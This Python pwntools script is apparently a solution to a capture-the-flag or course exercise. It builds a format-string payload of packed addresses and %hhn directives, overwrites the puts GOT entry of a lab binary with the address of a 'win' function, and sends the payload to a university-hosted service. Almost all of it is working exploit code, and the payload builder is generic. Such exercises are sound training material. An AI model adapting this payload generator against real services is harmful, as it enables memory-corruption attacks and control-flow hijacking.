from pwn import remote, process, p32, ELF
# Does not handle NUL bytes in any of the pointers it needs
def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
    """Assemble a format-string payload that stores ``data`` byte-by-byte at ``base``.

    The result is one packed 32-bit address per byte of ``data`` (consecutive
    addresses starting at ``base``), followed by one ``%<n>x%<k>$hhn`` directive
    per byte, where ``k`` counts up from ``arg_base``.  Each ``n`` is picked so
    that the running character count is congruent (mod 256) to the byte value
    being written.  Per-byte progress lines are printed to stdout.

    Args:
        base: address of the first byte to write.
        arg_base: format-string argument index used for the first byte.
        data: bytes to write, one per address.

    Returns:
        The concatenated address block and directive block.

    Raises:
        Exception: if the assembled payload contains a NUL byte.
    """
    address_part: list[bytes] = []
    directive_part: list[bytes] = []
    # The packed addresses precede the directives in the payload, so they
    # already count towards the characters printed (4 per p32 address).
    printed = 4 * len(data)

    for idx, byte in enumerate(data):
        target = base + idx
        address_part.append(p32(target))
        pad = byte - printed % 256
        # Keep the field width at least 8 so the directive always pads.
        if pad < 8:
            pad += 256
        print(f"addr={hex(target)} byte={hex(byte)} cum_chars={printed}({hex(printed%256)}) n={pad}")
        directive = f"%{pad}x%{arg_base + idx}$hhn"
        print(directive)
        directive_part.append(directive.encode('utf-8'))
        printed += pad

    payload = b"".join(address_part) + b"".join(directive_part)
    if b"\0" in payload:
        raise Exception("Payload requires a \\0")
    return payload
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25197

# Connect to the remote service; the two commented-out lines are the local
# alternative (run the binary as a child process, then `input()` pauses the
# script — what the pause was for is not shown here).
conn = remote(HOST, PORT)
#conn = process("07_call_functions")
#input()

# Read the GOT slot of puts and the address of win from the local copy of the
# binary; this assumes the local file matches the one the service runs.
elf = ELF("07_call_functions")
got_puts = elf.got['puts']
win = elf.sym['win']
# Build the payload that writes p32(win) over puts@GOT.  The literal 7 is
# forwarded as arg_base; how it was determined is not recorded in this file.
pl = print_to_ram(got_puts, 7, p32(win)) + b"\n"
print(f"Payload: ({len(pl)})", pl, "\n\n")

#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"

conn.send(pl)
# Echo whatever the service sends back, one byte at a time, until it closes.
while conn.connected():
    print(chr(conn.recv(1)[0]), end="", flush=True)